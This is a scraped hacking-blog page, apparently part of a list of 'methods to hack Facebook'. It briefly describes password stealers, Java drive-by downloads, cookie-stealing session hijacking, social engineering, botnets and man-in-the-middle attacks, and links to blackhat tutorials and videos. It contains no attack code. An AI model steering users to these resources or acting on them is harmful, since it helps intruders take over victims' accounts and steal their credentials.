Pdf Version - www.harmonysecurity.com/files/HS-P004_ARPPoisoning.pdf

----------------------------------------------------------------

10- Stealers - It is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's look like keyloggers but there are many differences, Stealer's steal only passwords that stored in the web browsers they wont capture keystrokes typed by the user
What Is Stealers How It's Work - http://oren-hack.blogspot.in/2012/06/tutorial-istealer-63.html

Advanced tutorial - http://www.101hacker.com/2011/09/hack-email-facebook-and-myspace.html

You Tube Link - http://www.youtube.com/watch?v=mOtXvbC0AMw

----------------------------------------------------------------

11 - Java Drive By - A Java Drive-By is a Java Applet that is coded in Java and is put on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be a virus or even a simple downloader. If you'd like to get the source code or wanna know more information about a Java Drive-By, use Google.
What Is Java Drive By ? How It's Work -http://blackhatcrackers.blogspot.in/2013/03/fud-java-driveby.html

You Tube Link - http://www.youtube.com/watch?v=UmzyTWbFWak
You Tube Link For Noobs Peoples - http://www.youtube.com/watch?v=LZdB2QAgDvY

----------------------------------------------------------------

12 - Cookie Stealing Attack - Cookies are small files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and authenticate the user .For example when a user logins in Facebook a unique string is generated and one copy of it is saved on the server and other is saved on the users browser as Cookies. Both are matched every time the user does any thing in his account. So if we steal the victims cookie and inject them in our browser we will be able to imitate the victims identity to the web server and thus we will be able to login is his account . This is called as Side jacking .The best thing about this is that we need not no the victims id or password all we need is the victims cookie.
What Is Cookie Stealing Attack ? -http://blackhatcrackers.blogspot.in/2013/01/cookie-stealing-attack.html

You Tube Link - http://www.youtube.com/watch?v=-H1qjiwQldw

-----------------------------------------------------------------

13 - Social Engineering - Social engineering is the use of deception and manipulation to obtain confidential information. It is a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking people into breaking normal security procedures. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. In anti virus computer security software, social engineering is generally a hacker's clever manipulation of the natural human tendency to trust. The hacker's goal is to obtain information that will gain him/her unauthorized access to a system and the information that resides on that system. Typical examples of social engineering are phishing e-mails or pharming sites.
What Is Social Engineering ? -http://blackhatcrackers.blogspot.in/2013/01/social-engineering-attack.html

You Tube Link - http://www.youtube.com/watch?v=4VeinrY0n7o
Pdf Version - himis.s3.amazonaws.com/social-engineering-techniques.pdf

-----------------------------------------------------------------

14 - Botnets - Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.
What Is Botnet ? How It's Work ? -http://blackhatcrackers.blogspot.in/2013/04/how-to-setup-botnet.html

You Tube Link - http://www.youtube.com/watch?v=zR3OQdEsRCc
Pdf Version -www.korelogic.com/Resources/Presentations/botnets_issa.pdf

-------------------------------------------------------------------------------------------------------------------------------

15 - Man In the Middle Attacks - A Man-in-the-Middle attack is a type of cyber attack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A Man-in-the-Middle Attack allows a malicious actor to intercept, send, and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late. Man-in-the-Middle attacks can be abbreviated in many ways including, MITM, MitM, MiM, or MIM.
How They Work ? What Was That -http://www.101hacker.com/2011/03/man-in-middle-attack-using-ettercap.html

You Tube - http://www.youtube.com/watch?v=Z19p4nDfeG8
Pdf Version -www.cs.umu.se/education/examina/Rapporter/MattiasEriksson.pdf

Read More Add comment

Nexus

Track a Cellphone Without The IP Address Using Trape Tool - Kali Linux

EMAGNET - The Best Tool To Find 97.1% Accurate Leaked Database

How To Extract All Sensitive Information From A Facebook Profile

Raccoon - A High Performance Offensive Security Tool For Reconnaissance And Vulnerability Scanning

Kali Linux 2018.3 Release - Penetration Testing and Ethical Hacking Linux Distribution

An Unicode Domain Phishing Generator for IDN Homograph Attack - EvilURL v2.0

Kali Linux NetHunter - Android penetration testing platform

SQLmap (Introduction+Usage)

Sqlmap

Download Link: http://adf.ly/qOGkX

Video :

Vulnerable Urls

Hacking with sqlmap

Discover Databases

Find tables in a particular database

Get columns of a table

Get data from a table

New E-Books

Get these e-books for Free !! From Below Links !!

PwnStar - Script for multi attack (for all your fake-AP needs!)

Usage

Basic Menu

Advanced Menu

Kali Linux 1.0.7 Released

Kernel 3.14, Tool Updates, Package Improvements

Kali Linux Encrypted USB Persistence

Tool Developers Ahoy!

Kali Linux: Greater Than the Sum of its Parts

Torrents, Virtual Machine & ARM images

Methods To Hack Facebook (Only For Educational Purpose)

This is only for educational purpose. Do at your own risk

Recent Posts

Facebook

Sqlmap

Download Link: http://adf.ly/qOGkX

Video :

Vulnerable Urls

Hacking with sqlmap

Discover Databases

Find tables in a particular database

Get columns of a table

Get data from a table

Get these e-books for Free !! From Below Links !!

Usage

Basic Menu

Advanced Menu

Kernel 3.14, Tool Updates, Package Improvements

Kali Linux Encrypted USB Persistence

Tool Developers Ahoy!

Kali Linux: Greater Than the Sum of its Parts

Torrents, Virtual Machine & ARM images

*****This is only for educational purpose. Do at your own risk *****

Recent Posts

Facebook

This is only for educational purpose. Do at your own risk